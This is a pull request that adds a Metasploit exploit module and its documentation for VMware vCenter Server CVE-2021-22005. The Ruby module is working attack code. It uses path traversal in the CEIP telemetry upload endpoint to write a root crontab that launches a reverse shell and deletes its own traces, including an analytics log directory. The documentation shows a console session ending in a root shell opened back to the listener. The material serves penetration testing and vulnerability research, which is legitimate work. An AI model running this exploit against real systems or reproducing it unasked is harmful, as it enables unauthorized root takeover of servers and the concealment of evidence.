### PR TITLE
Add VMware vCenter Server CVE-2021-22005 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload.md
+++ b/documentation/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload.md
@@ -1,0 +1,86 @@
+## Vulnerable Application
+
+### Setup
+
+Follow [VMware's official documentation] or the unorthodox steps below.
+
+1. Download ISO
+1. Extract OVA from ISO
+1. Import OVA
+1. Boot VM
+1. Set root password in console
+1. Complete setup at <https://change-this-to-your-target-host:5480/>
+1. _Ensure that [CEIP is enabled]_
+1. **(Optional)** Upgrade to desired patch level
+
+Initialization may take a while before the target is exploitable.
+
+[VMware's official documentation]: https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-8DC3866D-5087-40A2-8067-1361A2AF95BD.html
+[CEIP is enabled]: https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.vcenterhost.doc/GUID-F97CD334-CD4A-4592-B7B1-43A49CF74F39.html
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### VMware vCenter Server 6.7 Update 3n (Linux appliance)
+
+```
+msf6 > use exploit/linux/http/vmware_vcenter_analytics_file_upload
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > options
+
+Module options (exploit/linux/http/vmware_vcenter_analytics_file_upload):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > set rhosts 172.16.57.2
+rhosts => 172.16.57.2
+msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > set lhost 172.16.57.1
+lhost => 172.16.57.1
+msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > run
+
+[*] Started reverse SSL handler on 172.16.57.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. CEIP is fully enabled.
+[*] Creating path traversal
+[+] Successfully created path traversal
+[*] Executing cmd/unix/reverse_perl_ssl (Unix Command)
+[*] Writing system crontab: /etc/cron.d/GWjzDiAN.json
+[+] Successfully wrote system crontab
+[!] Please wait up to 63 seconds for a session
+[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.2:42868) at 2021-10-06 16:23:06 -0500
+
+id
+uid=0(root) gid=0(root) groups=0(root),1000(vami),4044(shellaccess),59005(coredump)
+uname -a
+Linux photon-machine 4.4.250-1.ph1 #1-photon SMP Fri Jan 15 03:01:15 UTC 2021 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb
+++ b/modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb
@@ -1,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',
+        'Description' => %q{
+          This module exploits a file upload in VMware vCenter Server's
+          analytics/telemetry (CEIP) service to write a system crontab and
+          execute shell commands as the root user.
+
+          Note that CEIP must be enabled for the target to be exploitable by
+          this module. CEIP is enabled by default.
+        },
+        'Author' => [
+          'George Noseevich', # Discovery
+          'Sergey Gerasimov', # Discovery
+          'VMware', # Initial PoC
+          'Derek Abdine', # Analysis
+          'wvu' # Analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2021-22005'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],
+          ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],
+          ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],
+          ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']
+        ],
+        'DisclosureDate' => '2021-09-21',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'WfsDelay' => 60
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),
+      'vars_get' => {
+        '_c' => ''
+      }
+    )
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 200 && res.body == '"FULL"'
+      return CheckCode::Safe('CEIP is not fully enabled.')
+    end
+
+    CheckCode::Appears('CEIP is fully enabled.')
+  end
+
+  def exploit
+    print_status('Creating path traversal')
+
+    unless write_file(rand_text_alphanumeric(8..16))
+      fail_with(Failure::NotVulnerable, 'Failed to create path traversal')
+    end
+
+    print_good('Successfully created path traversal')
+
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+
+    print_warning("Please wait up to #{wfs_delay} seconds for a session")
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Writing system crontab: #{crontab_path}")
+
+    crontab_file = crontab(cmd)
+    vprint_line(crontab_file)
+
+    unless write_file("../../../../../../etc/cron.d/#{crontab_name}", crontab_file)
+      fail_with(Failure::PayloadFailed, 'Failed to write system crontab')
+    end
+
+    print_good('Successfully wrote system crontab')
+  end
+
+  def write_file(path, data = nil)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),
+      'ctype' => 'application/json',
+      'vars_get' => {
+        '_c' => '',
+        '_i' => "/#{path}"
+      },
+      'data' => data
+    )
+
+    return false unless res&.code == 201
+
+    true
+  end
+
+  def crontab(cmd)
+    # https://man7.org/linux/man-pages/man5/crontab.5.html
+    <<~CRONTAB.strip
+      * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/
+      * * * * * root #{cmd}
+    CRONTAB
+  end
+
+  def crontab_path
+    "/etc/cron.d/#{crontab_name}.json"
+  end
+
+  def crontab_name
+    @crontab_name ||= rand_text_alphanumeric(8..16)
+  end
+
+end


### PR DESCRIPTION
```
msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > info

       Name: VMware vCenter Server Analytics (CEIP) Service File Upload
     Module: exploit/linux/http/vmware_vcenter_analytics_file_upload
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-09-21

Provided by:
  George Noseevich
  Sergey Gerasimov
  VMware
  Derek Abdine
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a file upload in VMware vCenter Server's
  analytics/telemetry (CEIP) service to write a system crontab and
  execute shell commands as the root user. Note that CEIP must be
  enabled for the target to be exploitable by this module. CEIP is
  enabled by default.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-22005
  https://www.vmware.com/security/advisories/VMSA-2021-0020.html
  https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis
  https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/
  https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee

msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) >
```